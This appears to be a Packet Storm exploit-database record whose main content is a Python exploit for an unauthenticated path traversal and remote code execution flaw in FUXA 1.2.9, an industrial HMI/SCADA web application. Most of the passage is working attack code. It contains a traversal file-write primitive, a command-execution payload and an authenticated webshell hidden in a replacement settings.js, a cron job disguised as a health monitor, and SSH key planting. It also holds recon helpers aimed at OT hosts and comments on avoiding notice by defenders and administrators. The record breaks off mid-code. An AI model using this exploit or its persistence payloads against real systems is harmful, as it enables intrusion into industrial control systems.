{“lastseen”:”2026-05-21T16:30:21″,”description”:”FUXA versions 1.2.9 and below suffers from an unauthenticated path traversal vulnerability that leads to arbitrary file write that enables remote code execution…”,”published”:”2026-05-21T00:00:00″,”modified”:”2026-05-21T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FUXA 1.2.9 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:221750″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25895″],”sourceData”:”# Exploit Title: FUXA 1.2.9 – RCE\\n # Date: 4\/24\/2026\\n # Exploit Author: Anthony Cihan (Hann1bl3L3ct3r)\\n # Vendor Homepage: https:\/\/github.com\/frangoteam\/FUXA\\n # Version: \\u003c= 1.2.9 \\n # Tested on: Ubuntu Server \\n # CVE : CVE-2026-25895\\n \\n \\”\\”\\”\\n CVE-2026-25895 – FUXA Unauthenticated Path Traversal -\\u003e Arbitrary File Write -\\u003e RCE\\n Affected: FUXA \\u003c= 1.2.9\\n Patched: 1.2.10\\n \\n Vulnerable endpoint: POST \/api\/upload (server\/api\/projects\/index.js, ~line 193)\\n Root cause:\\n * The \/api\/upload route is registered with NO middleware:\\n prjApp.post(‘\/api\/upload’, function (req, res) { … })\\n so it bypasses both `secureFnc` (JWT\/API-key) and the admin permission\\n gate that wraps every other endpoint in projects\/index.js.\\n * Inside the handler, the JSON-body field `destination` is concatenated\\n into a path with only a leading underscore and no normalization \/\\n containment check:\\n let destinationDir = path.resolve(runtime.settings.appDir,\\n `_${destination}`);\\n filePath = path.join(destinationDir, fullPath || fileName);\\n fs.writeFileSync(filePath, basedata, encoding);\\n A relative payload of the form `a\/..\/..\/..\/..\/\\u003ctarget\\u003e` makes\\n Node’s path.resolve() climb out of `appDir` to anywhere the FUXA\\n process can write.\\n * `fullPath`\/`fileName` strip `..` sequences, so we control the directory\\n via `destination` and the filename via `file.name`.\\n \\n Exploitation: pre-auth RCE even when `secureEnabled = true`.\\n \\n Authorization: this script is for credentialed penetration tests against\\n systems you are explicitly authorized to assess. Use only inside a defined\\n engagement scope.\\n \\”\\”\\”\\n \\n from __future__ import annotations\\n \\n import argparse\\n import base64\\n import json\\n import posixpath\\n import secrets\\n import sys\\n from typing import Dict, List, Optional, Tuple\\n from urllib.parse import urljoin, urlparse, quote\\n \\n try:\\n import requests\\n except ImportError:\\n sys.stderr.write(\\”[-] Missing dependency: pip install requests\\\\n\\”)\\n sys.exit(2)\\n \\n \\n BANNER = r\\”\\”\\”\\n ______ _ ___ __ _______ ___ _\\n | ____| | | \\\\ \\\\ \/ \/ \/\\\\ | __ \\\\ \\\\ \/ \/ \\\\ | |\\n | |__ | | | |\\\\ V \/ \/ \\\\ | |__) \\\\ \\\\ \/\\\\ \/ \/| \\\\| |\\n | __| | | | | \\u003e \\u003c \/ \/\\\\ \\\\ | ___\/ \\\\ \\\\\/ \\\\\/ \/ | . ` |\\n | | | |__| |\/ . \\\\ \/ ____ \\\\| | \\\\ \/\\\\ \/ | |\\\\ |\\n |_| \\\\____\/\/_\/ \\\\_\\\\\/_\/ \\\\_\\\\_| \\\\\/ \\\\\/ |_| \\\\_|\\n \\n CVE-2026-25895 :: FUXA \\u003c=1.2.9 Unauth Path Traversal -\\u003e RCE\\n \\”\\”\\”\\n \\n \\n # — Server response helpers —————————————————\\n \\n def _extract_errno(response_text: str) -\\u003e Optional[str]:\\n \\”\\”\\”Parse the server’s error JSON body (e.g. {\\”error\\”:\\”EACCES\\”,\\”message\\”:\\n \\”EACCES: permission denied, open ‘\/root\/x’\\”}) and return the errno code.\\n Returns None if the body is not JSON or has no ‘error’ key.\\n \\”\\”\\”\\n if not response_text:\\n return None\\n try:\\n data = json.loads(response_text)\\n except (ValueError, TypeError):\\n return None\\n if isinstance(data, dict):\\n err = data.get(\\”error\\”)\\n if isinstance(err, str):\\n return err\\n return None\\n \\n \\n def _extract_syscall(response_text: str) -\\u003e Optional[str]:\\n \\”\\”\\”Parse the server’s error JSON body and return the Node.js syscall that\\n failed (e.g. ‘open’, ‘mkdir’, ‘write’). The upload handler forwards\\n `err.message`, which for POSIX fs errors is formatted by libuv as:\\n \\”\\u003cCODE\\u003e: \\u003creason\\u003e, \\u003csyscall\\u003e ‘\\u003cpath\\u003e’\\”\\n So we pull the token between the comma and the quoted path.\\n \\n The syscall lets us distinguish ambiguous errno values. In particular, on\\n EACCES the upload handler conditionally calls fs.mkdirSync(parent,\\n {recursive: true}) before writing \u2014 so a non-existent \/home\/\\u003cuser\\u003e\/ gets\\n mkdir-EACCES (can’t create under root-owned \/home\/), while an existing\\n \/home\/\\u003cother\\u003e\/ (mode 0700) gets open-EACCES on the write itself. Same\\n errno, different meaning.\\n \\”\\”\\”\\n if not response_text:\\n return None\\n try:\\n data = json.loads(response_text)\\n except (ValueError, TypeError):\\n return None\\n if not isinstance(data, dict):\\n return None\\n msg = data.get(\\”message\\”)\\n if not isinstance(msg, str):\\n return None\\n # Format: \\”EACCES: permission denied, mkdir ‘\/home\/tony’\\”\\n # ^^^^^\\n try:\\n tail = msg.split(\\”,\\”, 1)[1].strip() # \\”mkdir ‘\/home\/tony’\\”\\n syscall = tail.split(\\” \\”, 1)[0].strip()\\n if syscall and syscall.isalpha():\\n return syscall.lower()\\n except (IndexError, AttributeError):\\n pass\\n return None\\n \\n \\n # — Low-level upload primitive ————————————————\\n \\n class FuxaUploadExploit:\\n \\”\\”\\”Wraps the vulnerable POST \/api\/upload endpoint.\\”\\”\\”\\n \\n def __init__(self, base_url: str, timeout: int = 15, verify_tls: bool = True,\\n proxy: Optional[str] = None, verbose: bool = True):\\n self.base_url = base_url.rstrip(\\”\/\\”)\\n self.timeout = timeout\\n self.verify_tls = verify_tls\\n self.verbose = verbose\\n self.session = requests.Session()\\n self.session.headers.update({\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (FUXA-CVE-2026-25895-PoC)\\”,\\n \\”Content-Type\\”: \\”application\/json\\”,\\n })\\n if proxy:\\n self.session.proxies = {\\”http\\”: proxy, \\”https\\”: proxy}\\n \\n # —- helpers ————————————————————–\\n \\n def _log(self, msg: str) -\\u003e None:\\n if self.verbose:\\n print(msg, flush=True)\\n \\n def fingerprint(self) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”GET \/api\/version returns FUXA’s own version string (‘1.0.0’ for the\\n api wrapper) \u2014 used as a pre-flight reachability check.\\n \\”\\”\\”\\n url = urljoin(self.base_url + \\”\/\\”, \\”api\/version\\”)\\n try:\\n r = self.session.get(url, timeout=self.timeout, verify=self.verify_tls)\\n except requests.RequestException as e:\\n return False, f\\”connection error: {e}\\”\\n if r.status_code != 200:\\n return False, f\\”unexpected status {r.status_code}\\”\\n return True, r.text.strip()\\n \\n def fetch_settings(self) -\\u003e Tuple[bool, str, Optional[Dict]]:\\n \\”\\”\\”GET \/api\/settings returns the full `runtime.settings` object\\n (minus smtp password \/ secretCode) with NO auth middleware in FUXA\\n \\u003c=1.2.9. Primary pre-auth information leak used by –mode recon.\\n \\”\\”\\”\\n url = urljoin(self.base_url + \\”\/\\”, \\”api\/settings\\”)\\n try:\\n r = self.session.get(url, timeout=self.timeout, verify=self.verify_tls)\\n except requests.RequestException as e:\\n return False, f\\”connection error: {e}\\”, None\\n if r.status_code != 200:\\n return False, f\\”unexpected status {r.status_code}\\”, None\\n try:\\n return True, \\”ok\\”, r.json()\\n except ValueError:\\n return False, f\\”non-JSON response (first 200B): {r.text[:200]!r}\\”, None\\n \\n # —- core exploit ———————————————————\\n \\n def upload(self, destination: str, filename: str, content: bytes,\\n file_type: str = \\”bin\\”) -\\u003e requests.Response:\\n \\”\\”\\”Send the crafted upload that triggers the path-traversal write.\\n \\n Server-side decoding rules (from server\/api\/projects\/index.js):\\n * if file.type === ‘svg’ -\\u003e raw write of file.data (no decoding)\\n * otherwise -\\u003e file.data is treated as base64 and\\n written via fs.writeFileSync(…, ‘base64’)\\n We use base64 by default so we can deliver arbitrary binary content.\\n \\”\\”\\”\\n if file_type == \\”svg\\”:\\n # Raw text passthrough; keep file.type = ‘svg’ so the server\\n # writes it without base64 decoding.\\n data_field = content.decode(\\”utf-8\\”, errors=\\”replace\\”)\\n else:\\n data_field = base64.b64encode(content).decode(\\”ascii\\”)\\n \\n body = {\\n \\”resource\\”: {\\n \\”name\\”: filename,\\n \\”fullPath\\”: filename, # written into the destination dir verbatim\\n \\”type\\”: file_type,\\n \\”data\\”: data_field,\\n },\\n \\”destination\\”: destination,\\n }\\n \\n url = urljoin(self.base_url + \\”\/\\”, \\”api\/upload\\”)\\n return self.session.post(url, data=json.dumps(body),\\n timeout=self.timeout, verify=self.verify_tls)\\n \\n def write_arbitrary(self, target_abs_path: str, content: bytes,\\n appdir_depth: int = 10, file_type: str = \\”bin\\”) -\\u003e dict:\\n \\”\\”\\”High-level: write `content` to any absolute path the FUXA process\\n can reach.\\n \\n We assume FUXA’s `runtime.settings.appDir` is the `server\/` directory\\n of the install. To climb out of it we prepend a dummy segment + N\\n `..` jumps. `appdir_depth` is intentionally generous; extra `..`\\n components past the filesystem root are no-ops on POSIX.\\n \\”\\”\\”\\n # Use posixpath unconditionally \u2014 the target is a Linux server, so we\\n # cannot let the host’s os.path module rewrite separators on Windows.\\n target_abs_path = posixpath.normpath(target_abs_path.replace(\\”\\\\\\\\\\”, \\”\/\\”))\\n if not target_abs_path.startswith(\\”\/\\”):\\n raise ValueError(\\”target_abs_path must be absolute (POSIX)\\”)\\n \\n target_dir, target_name = posixpath.split(target_abs_path)\\n # destination becomes: a\/..\/\/..\/\/..\/\/..\/\/..\/\/..\/\/..\/\/.. + target_dir\\n # path.resolve(appDir, ‘_a\/..\/\/..\/\/…\/target_dir’) -\\u003e target_dir\\n # The leading ‘a’ is a throw-away segment that absorbs the ‘_’ prefix.\\n traversal = \\”a\\” + (\\”\/..\\” * appdir_depth)\\n destination = traversal + target_dir # target_dir starts with ‘\/’\\n \\n resp = self.upload(destination=destination, filename=target_name,\\n content=content, file_type=file_type)\\n \\n ok = resp.status_code == 200\\n return {\\n \\”status_code\\”: resp.status_code,\\n \\”response_text\\”: resp.text[:400],\\n \\”errno\\”: _extract_errno(resp.text),\\n \\”syscall\\”: _extract_syscall(resp.text),\\n \\”target\\”: target_abs_path,\\n \\”wrote_bytes\\”: len(content),\\n \\”success\\”: ok,\\n }\\n \\n \\n # — High-level payloads ——————————————————-\\n \\n def payload_proof(host: str) -\\u003e bytes:\\n \\”\\”\\”Default canary payload. Deliberately bland \u2014 no CVE ID, no vendor\\n name, no tool signature \u2014 so that the file sitting on the target’s\\n filesystem is not a glaring IOC for log-scraping defenders or DFIR.\\n Operators who want an explicit PoC demo payload should use\\n –canary-content to supply their own file.\\n \\”\\”\\”\\n _ = host # retained for API compatibility; intentionally unused\\n return b\\”healthcheck ok\\\\n\\”\\n \\n \\n def payload_settings_js_rce(callback_cmd: str,\\n real_settings: Optional[Dict] = None) -\\u003e bytes:\\n \\”\\”\\”A drop-in replacement for FUXA’s _appdata\/settings.js.\\n \\n The file is loaded via require() in main.js at every startup, so any JS\\n placed at module top-level executes inside the FUXA Node process the\\n next time FUXA initializes. Passing `real_settings` (the dict returned\\n by GET \/api\/settings) preserves the target’s actual configuration \u2014\\n uiPort, allowedOrigins, secureEnabled, custom paths \u2014 so admins don’t\\n notice config drift after restart.\\n \\”\\”\\”\\n # NB: the callback_cmd is interpolated as a JS string. Escape backslashes\\n # and single-quotes so it survives JS parsing. Single-quoted JS string.\\n safe = callback_cmd.replace(\\”\\\\\\\\\\”, \\”\\\\\\\\\\\\\\\\\\”).replace(\\”‘\\”, \\”\\\\\\\\’\\”)\\n return (\\n \\”\/\/ CVE-2026-25895 PoC \u2014 replacement settings.js (command payload)\\\\n\\”\\n \\”try {\\\\n\\”\\n \\” require(‘child_process’).exec(‘\\” + safe + \\”‘,\\\\n\\”\\n \\” { detached: true, stdio: ‘ignore’ });\\\\n\\”\\n \\”} catch (e) { \/* swallow so FUXA still boots *\/ }\\\\n\\”\\n \\”\\\\n\\”\\n + _settings_module_exports(real_settings)\\n ).encode(\\”utf-8\\”)\\n \\n \\n def payload_authorized_keys(pubkey: str) -\\u003e bytes:\\n return (pubkey.rstrip(\\”\\\\n\\”) + \\”\\\\n\\”).encode(\\”utf-8\\”)\\n \\n \\n # — Webshell payload ———————————————————-\\n #\\n # The canonical Node-on-target webshell: a replacement settings.js module\\n # that, at module-load time, spawns an HTTP listener inside the FUXA process.\\n # The listener exposes a single authenticated endpoint that runs commands via\\n # child_process.exec and returns stdout\/stderr in the HTTP response body.\\n #\\n # Design notes:\\n # * Bind on 0.0.0.0:\\u003cws_port\\u003e (configurable). Different port from FUXA’s\\n # main 1881 so we don’t collide with the app’s own Express server.\\n # * Auth: required token via `X-Auth-Token` header OR `?t=\\u003ctoken\\u003e` query.\\n # Wrong \/ missing token -\\u003e 404 (indistinguishable from a non-existent\\n # endpoint) to make the listener invisible to dumb scanners.\\n # * Path: configurable random secret path (default: 24 random hex chars).\\n # Requests to any other path also get 404.\\n # * Error isolation: server.on(‘error’, …) swallows EADDRINUSE and\\n # friends so a restart cycle that can’t rebind the port does NOT take\\n # FUXA down. Try\/catch wraps the whole initialization for the same\\n # reason \u2014 the settings.js load path MUST NOT throw, or FUXA will\\n # fail to boot.\\n # * The module still exports the full settings object verbatim so FUXA\\n # boots cleanly and operators see a healthy service.\\n \\n def payload_webshell_js(ws_port: int, ws_path: str, ws_token: str,\\n real_settings: Optional[Dict] = None) -\\u003e bytes:\\n \\”\\”\\”Replacement settings.js that, on FUXA startup, binds an authenticated\\n HTTP command-execution endpoint inside the Node process.\\n \\n Passing `real_settings` (from GET \/api\/settings) preserves the target’s\\n actual configuration in the module.exports block so the service looks\\n unchanged to admins after restart.\\n \\”\\”\\”\\n # All three operator inputs are interpolated into a JS string literal.\\n # Escape backslashes + single quotes so nothing breaks out.\\n def esc(s: str) -\\u003e str:\\n return s.replace(\\”\\\\\\\\\\”, \\”\\\\\\\\\\\\\\\\\\”).replace(\\”‘\\”, \\”\\\\\\\\’\\”)\\n \\n path_js = esc(ws_path if ws_path.startswith(\\”\/\\”) else \\”\/\\” + ws_path)\\n token_js = esc(ws_token)\\n \\n return (\\n \\”\/\/ CVE-2026-25895 PoC \u2014 replacement settings.js (HTTP webshell)\\\\n\\”\\n \\”try {\\\\n\\”\\n \\” const http = require(‘http’);\\\\n\\”\\n \\” const { exec } = require(‘child_process’);\\\\n\\”\\n \\” const urlMod = require(‘url’);\\\\n\\”\\n \\” const WS_PORT = \\” + str(int(ws_port)) + \\”;\\\\n\\”\\n \\” const WS_PATH = ‘\\” + path_js + \\”‘;\\\\n\\”\\n \\” const WS_TOKEN = ‘\\” + token_js + \\”‘;\\\\n\\”\\n \\” const server = http.createServer((req, res) =\\u003e {\\\\n\\”\\n \\” try {\\\\n\\”\\n \\” const parsed = urlMod.parse(req.url || ”, true);\\\\n\\”\\n \\” const hdrTok = req.headers[‘x-auth-token’];\\\\n\\”\\n \\” const qTok = parsed.query \\u0026\\u0026 parsed.query.t;\\\\n\\”\\n \\” const tok = (typeof hdrTok === ‘string’) ? hdrTok : qTok;\\\\n\\”\\n \\” if (parsed.pathname !== WS_PATH || tok !== WS_TOKEN) {\\\\n\\”\\n \\” res.writeHead(404, {‘Content-Type’: ‘text\/plain’});\\\\n\\”\\n \\” res.end(‘Not Found’);\\\\n\\”\\n \\” return;\\\\n\\”\\n \\” }\\\\n\\”\\n \\” const handle = (cmd) =\\u003e {\\\\n\\”\\n \\” if (!cmd) {\\\\n\\”\\n \\” res.writeHead(400, {‘Content-Type’: ‘text\/plain’});\\\\n\\”\\n \\” res.end(‘missing cmd’);\\\\n\\”\\n \\” return;\\\\n\\”\\n \\” }\\\\n\\”\\n \\” exec(cmd, { timeout: 60000, maxBuffer: 16*1024*1024, shell: ‘\/bin\/sh’ },\\\\n\\”\\n \\” (err, stdout, stderr) =\\u003e {\\\\n\\”\\n \\” let out = ”;\\\\n\\”\\n \\” if (stdout) out += stdout.toString();\\\\n\\”\\n \\” if (stderr) out += stderr.toString();\\\\n\\”\\n \\” if (err \\u0026\\u0026 typeof err.code !== ‘undefined’ \\u0026\\u0026 err.code !== 0) {\\\\n\\”\\n \\” out += ‘\\\\\\\\n[exit ‘ + err.code + ‘]’;\\\\n\\”\\n \\” }\\\\n\\”\\n \\” res.writeHead(200, {‘Content-Type’: ‘text\/plain; charset=utf-8’});\\\\n\\”\\n \\” res.end(out);\\\\n\\”\\n \\” });\\\\n\\”\\n \\” };\\\\n\\”\\n \\” if (req.method === ‘POST’) {\\\\n\\”\\n \\” let body = ”;\\\\n\\”\\n \\” req.on(‘data’, (c) =\\u003e { body += c; if (body.length \\u003e 65536) req.destroy(); });\\\\n\\”\\n \\” req.on(‘end’, () =\\u003e {\\\\n\\”\\n \\” let cmd = parsed.query.cmd;\\\\n\\”\\n \\” if (!cmd \\u0026\\u0026 body) {\\\\n\\”\\n \\” try {\\\\n\\”\\n \\” const j = JSON.parse(body);\\\\n\\”\\n \\” cmd = j.cmd;\\\\n\\”\\n \\” } catch (e) { cmd = body; }\\\\n\\”\\n \\” }\\\\n\\”\\n \\” handle(cmd);\\\\n\\”\\n \\” });\\\\n\\”\\n \\” req.on(‘error’, () =\\u003e { try { res.end(); } catch (e) {} });\\\\n\\”\\n \\” } else {\\\\n\\”\\n \\” handle(parsed.query.cmd);\\\\n\\”\\n \\” }\\\\n\\”\\n \\” } catch (e) {\\\\n\\”\\n \\” try { res.writeHead(500); res.end(‘err’); } catch (ee) {}\\\\n\\”\\n \\” }\\\\n\\”\\n \\” });\\\\n\\”\\n \\” server.on(‘error’, () =\\u003e { \/* swallow bind errors *\/ });\\\\n\\”\\n \\” server.listen(WS_PORT, ‘0.0.0.0’);\\\\n\\”\\n \\”} catch (e) { \/* swallow so FUXA still boots *\/ }\\\\n\\”\\n \\”\\\\n\\”\\n + _settings_module_exports(real_settings)\\n ).encode(\\”utf-8\\”)\\n \\n \\n def _settings_module_exports(real_settings: Optional[Dict] = None) -\\u003e str:\\n \\”\\”\\”Return JS source for `module.exports = {…}`.\\n \\n When `real_settings` is provided (fetched from GET \/api\/settings), emit\\n it as a JSON literal \u2014 JSON is a valid JavaScript expression when used\\n as an object literal, and this preserves the target’s real uiPort,\\n allowedOrigins, secureEnabled, custom paths, etc. so admins don’t spot\\n config drift after restart.\\n \\n Caveats (see server\/api\/index.js:103-110):\\n * `\/api\/settings` DELETES `secretCode` from its response, and\\n `smtp.password` if smtp is set. Our replacement settings.js will not\\n contain them. jwt-helper.js:6 falls back to ‘frangoteam751’ when\\n secretCode is missing, which invalidates any existing JWTs issued\\n under a previously-customized secretCode. The default install has\\n secretCode commented out (settings.default.js:94), so most targets\\n are unaffected \u2014 but when `secureEnabled: true`, warn the operator.\\n * process.env.PORT resolution is lost (we only see the runtime value).\\n In practice FUXA installs rarely rely on PORT env dynamism.\\n \\n When `real_settings` is None, fall back to a minimal config that matches\\n settings.default.js so FUXA still boots. Use this only when the recon\\n fetch failed \u2014 prefer the real-settings path.\\n \\”\\”\\”\\n if real_settings is not None:\\n body = json.dumps(real_settings, indent=4, ensure_ascii=False,\\n sort_keys=False, default=str)\\n return \\”module.exports = \\” + body + \\”;\\\\n\\”\\n # Fallback \u2014 minimal config derived from FUXA 1.2.9 settings.default.js.\\n return (\\n \\”module.exports = {\\\\n\\”\\n \\” version: 1.4,\\\\n\\”\\n \\” language: ‘en’,\\\\n\\”\\n \\” uiPort: process.env.PORT || 1881,\\\\n\\”\\n \\” logDir: ‘_logs’,\\\\n\\”\\n \\” logApiLevel: ‘tiny’,\\\\n\\”\\n \\” dbDir: ‘_db’,\\\\n\\”\\n \\” daqEnabled: true,\\\\n\\”\\n \\” daqTokenizer: 24,\\\\n\\”\\n \\” logs: { retention: ‘none’ },\\\\n\\”\\n \\” broadcastAll: false,\\\\n\\”\\n \\” allowedOrigins: [‘http:\/\/localhost’, ‘http:\/\/127.0.0.1’,\\\\n\\”\\n \\” ‘http:\/\/192.168.*’, ‘http:\/\/10.*’,\\\\n\\”\\n \\” ‘http:\/\/localhost:4200’],\\\\n\\”\\n \\” heartbeatIntervalSec: 10,\\\\n\\”\\n \\” webcamSnapShotsDir: ‘_webcam_snapshots’,\\\\n\\”\\n \\” webcamSnapShotsCleanup: false,\\\\n\\”\\n \\” webcamSnapShotsRetain: 7,\\\\n\\”\\n \\” swaggerEnabled: false,\\\\n\\”\\n \\” nodeRedEnabled: false,\\\\n\\”\\n \\”};\\\\n\\”\\n )\\n \\n \\n # — Cron payload ————————————————————–\\n #\\n # The write primitive can drop directly into cron-reread paths. When FUXA\\n # runs as root (common in container deployments, and in any install where\\n # the service was started by an admin who didn’t bother with a dedicated\\n # user), \/etc\/cron.d\/\\u003cname\\u003e is re-read every minute by the cron daemon \u2014\\n # that’s RCE with a \\u003c=60s delay and no FUXA restart.\\n #\\n # When FUXA runs as a non-root user, \/var\/spool\/cron\/crontabs\/\\u003cuser\\u003e\\n # (Debian\/Vixie layout) or \/var\/spool\/cron\/\\u003cuser\\u003e (RHEL\/cronie) is the\\n # equivalent, but those user-crontab paths require mode 0600 and the\\n # correct owning uid; fs.writeFileSync will produce mode 0644 owned by\\n # the FUXA uid, which matches the owner but not the mode \u2014 Vixie rejects,\\n # cronie accepts. Test per engagement.\\n \\n _CRON_HEADER = (\\n \\”# FUXA health monitor\\\\n\\”\\n \\”SHELL=\/bin\/sh\\\\n\\”\\n \\”PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\\\\n\\”\\n )\\n \\n \\n def payload_cron_job(schedule: str, user: Optional[str], cmd: str) -\\u003e bytes:\\n \\”\\”\\”Build a cron file body.\\n \\n If `user` is given (required for \/etc\/cron.d\/* and \/etc\/crontab), the\\n user field is included. For \/var\/spool\/cron\/crontabs\/\\u003cuser\\u003e style files,\\n pass user=None so only `schedule cmd` is written.\\n \\”\\”\\”\\n if user:\\n line = f\\”{schedule} {user} {cmd}\\\\n\\”\\n else:\\n line = f\\”{schedule} {cmd}\\\\n\\”\\n return (_CRON_HEADER + line).encode(\\”utf-8\\”)\\n \\n \\n # — Webshell client ———————————————————–\\n #\\n # Convenience: after writing the webshell payload, the operator can exec\\n # commands through it directly from this script instead of reaching for curl.\\n \\n class FuxaWebshellClient:\\n \\”\\”\\”Thin HTTP client for the webshell listener embedded in settings.js.\\”\\”\\”\\n \\n def __init__(self, host: str, port: int, ws_path: str, ws_token: str,\\n timeout: int = 65, use_tls: bool = False,\\n verify_tls: bool = True, proxy: Optional[str] = None):\\n if not ws_path.startswith(\\”\/\\”):\\n ws_path = \\”\/\\” + ws_path\\n scheme = \\”https\\” if use_tls else \\”http\\”\\n self.url = f\\”{scheme}:\/\/{host}:{port}{ws_path}\\”\\n self.token = ws_token\\n self.timeout = timeout\\n self.verify_tls = verify_tls\\n self.session = requests.Session()\\n self.session.headers.update({\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (FUXA-CVE-2026-25895-Shell)\\”,\\n \\”X-Auth-Token\\”: ws_token,\\n \\”Content-Type\\”: \\”application\/json\\”,\\n })\\n if proxy:\\n self.session.proxies = {\\”http\\”: proxy, \\”https\\”: proxy}\\n \\n def exec(self, cmd: str) -\\u003e Tuple[int, str]:\\n try:\\n r = self.session.post(\\n self.url,\\n data=json.dumps({\\”cmd\\”: cmd}),\\n timeout=self.timeout,\\n verify=self.verify_tls,\\n )\\n return r.status_code, r.text\\n except requests.RequestException as e:\\n return 0, f\\”[client] request failed: {e}\\”\\n \\n def alive(self) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”Cheap liveness check \u2014 the listener is up if `echo ok` returns.\\”\\”\\”\\n code, body = self.exec(\\”echo ok\\”)\\n return (code == 200 and \\”ok\\” in body), f\\”HTTP {code}: {body.strip()[:120]}\\”\\n \\n \\n def _interactive_loop(client: \\”FuxaWebshellClient\\”) -\\u003e None:\\n print(\\”[*] Webshell client \u2014 type commands, :q to exit, :help for tips\\”,\\n flush=True)\\n ok, info = client.alive()\\n if ok:\\n print(f\\”[+] Listener reachable ({info})\\”, flush=True)\\n else:\\n print(f\\”[!] Listener not responding yet ({info}). FUXA may not have \\”\\n \\”restarted since the webshell payload was written \u2014 wait for \\”\\n \\”the next cold start, then retry.\\”, flush=True)\\n try:\\n while True:\\n try:\\n line = input(\\”fuxa$ \\”)\\n except EOFError:\\n print()\\n break\\n if not line.strip():\\n continue\\n if line.strip() in (\\”:q\\”, \\”:quit\\”, \\”:exit\\”):\\n break\\n if line.strip() == \\”:help\\”:\\n print(\\” :q – quit\\\\n\\”\\n \\” :alive – ping the listener\\\\n\\”\\n \\” any other – run via \/bin\/sh on the target\\”,\\n flush=True)\\n continue\\n if line.strip() == \\”:alive\\”:\\n ok, info = client.alive()\\n print(f\\” {‘[+]’ if ok else ‘[-]’} {info}\\”, flush=True)\\n continue\\n code, body = client.exec(line)\\n if code != 200:\\n print(f\\”[!] HTTP {code}\\”, flush=True)\\n sys.stdout.write(body)\\n if body and not body.endswith(\\”\\\\n\\”):\\n sys.stdout.write(\\”\\\\n\\”)\\n sys.stdout.flush()\\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Interrupted.\\”, flush=True)\\n \\n \\n # — Recon helpers ————————————————————-\\n #\\n # `\/api\/settings` is registered WITHOUT auth middleware in server\/api\/index.js\\n # at line 103, so an unauthenticated GET returns the full `runtime.settings`\\n # object (smtp password + secretCode redacted). The absolute paths in that\\n # object reveal the FUXA cwd and, by inference, the OS user the process runs\\n # under. This is the primary recon primitive.\\n \\n # Path-prefix patterns that map to a likely running user or deployment context.\\n USER_CONTEXT_HINTS: List[Tuple[str, str, Optional[str]]] = [\\n # (prefix, human-readable context, inferred user)\\n (\\”\/root\/\\”, \\”paths under \/root\/\\”, \\”root\\”),\\n (\\”\/usr\/src\/app\/\\”, \\”upstream FUXA Dockerfile WORKDIR\\”, \\”root (in container)\\”),\\n (\\”\/opt\/fuxa\/\\”, \\”\/opt packaged install\\”, \\”fuxa (typical service user)\\”),\\n (\\”\/opt\/FUXA\/\\”, \\”\/opt packaged install (uppercase layout)\\”, \\”fuxa \/ root\\”),\\n (\\”\/srv\/fuxa\/\\”, \\”\/srv packaged install\\”, \\”fuxa (typical service user)\\”),\\n (\\”\/var\/lib\/fuxa\/\\”, \\”systemd dedicated-user install\\”, \\”fuxa\\”),\\n (\\”\/app\/\\”, \\”Docker container (custom image)\\”, \\”root (likely)\\”),\\n (\\”\/tmp\/\\”, \\”non-standard \/ dev\/test deployment\\”, None),\\n ]\\n \\n # Paths whose fields are worth printing in a recon summary.\\n _RECON_KEYS_INTERESTING: List[str] = [\\n \\”version\\”, \\”uiHost\\”, \\”uiPort\\”, \\”serverPort\\”, \\”language\\”,\\n \\”environment\\”, \\”secureEnabled\\”, \\”nodeRedEnabled\\”, \\”swaggerEnabled\\”,\\n \\”appDir\\”, \\”workDir\\”, \\”logDir\\”, \\”dbDir\\”,\\n \\”uploadFileDir\\”, \\”imagesFileDir\\”, \\”widgetsFileDir\\”,\\n \\”reportsDir\\”, \\”webcamSnapShotsDir\\”, \\”userSettingsFile\\”,\\n \\”httpStatic\\”, \\”userDir\\”,\\n ]\\n \\n # Subset of keys that should hold an absolute path \u2014 used for user inference.\\n _RECON_KEYS_PATHS: List[str] = [\\n \\”appDir\\”, \\”workDir\\”, \\”logDir\\”, \\”dbDir\\”,\\n \\”uploadFileDir\\”, \\”imagesFileDir\\”, \\”widgetsFileDir\\”,\\n \\”reportsDir\\”, \\”webcamSnapShotsDir\\”, \\”userSettingsFile\\”,\\n \\”httpStatic\\”, \\”userDir\\”,\\n ]\\n \\n \\n # Home-directory candidates for active user inference.\\n #\\n # Rationale: when the install paths leaked by \/api\/settings don’t reveal the\\n # running user (e.g. install is under \/opt, \/tmp, or a generic \/app), and the\\n # \/root probe fails (not root), we still need the user’s name before we can\\n # drop ssh keys or write anywhere under \/home\/\\u003cuser\\u003e\/. A 0-byte write to\\n # \/home\/\\u003ccandidate\\u003e\/.fuxa-probe-\\u003crand\\u003e is a strong positive signal: home dirs\\n # are typically mode 0700 owned by the user, so a successful write implies\\n # FUXA runs as that user. Failure is ambiguous (no dir OR no perm), so we\\n # only act on successes.\\n #\\n # Keep this list short and high-signal. Each probe leaves a marker file on the\\n # target, so a 100-entry list also means 100 files to clean up. Operators with\\n # a known-user shortlist should pass –home-wordlist.\\n \\n DEFAULT_HOME_CANDIDATES: List[str] = [\\n # Service \/ role accounts common on SCADA \/ OT boxes\\n \\”fuxa\\”, \\”scada\\”, \\”operator\\”, \\”opc\\”, \\”plc\\”, \\”hmi\\”,\\n \\”node\\”, \\”nodered\\”, \\”service\\”, \\”app\\”,\\n # Distro \/ image defaults\\n \\”ubuntu\\”, \\”debian\\”, \\”centos\\”, \\”admin\\”, \\”pi\\”,\\n # Generic\\n \\”user\\”,\\n ]\\n \\n \\n def _infer_user_from_path(p: str) -\\u003e Tuple[str, Optional[str]]:\\n \\”\\”\\”Given one absolute path from settings, return (context, likely_user).\\”\\”\\”\\n if p.startswith(\\”\/home\/\\”):\\n # Expect \/home\/\\u003cname\\u003e\/… \u2014 grab the \\u003cname\\u003e segment.\\n parts = p.split(\\”\/\\”, 3) # [”, ‘home’, ‘\\u003cname\\u003e’, ‘\\u003crest\\u003e’]\\n if len(parts) \\u003e= 3 and parts[2]:\\n return (f\\”home-directory install under \/home\/{parts[2]}\/\\”, parts[2])\\n return (\\”home-directory install under \/home\/\\”, None)\\n for prefix, label, user in USER_CONTEXT_HINTS:\\n if p.startswith(prefix):\\n return (label, user)\\n return (\\”unrecognized path layout \u2014 inspect 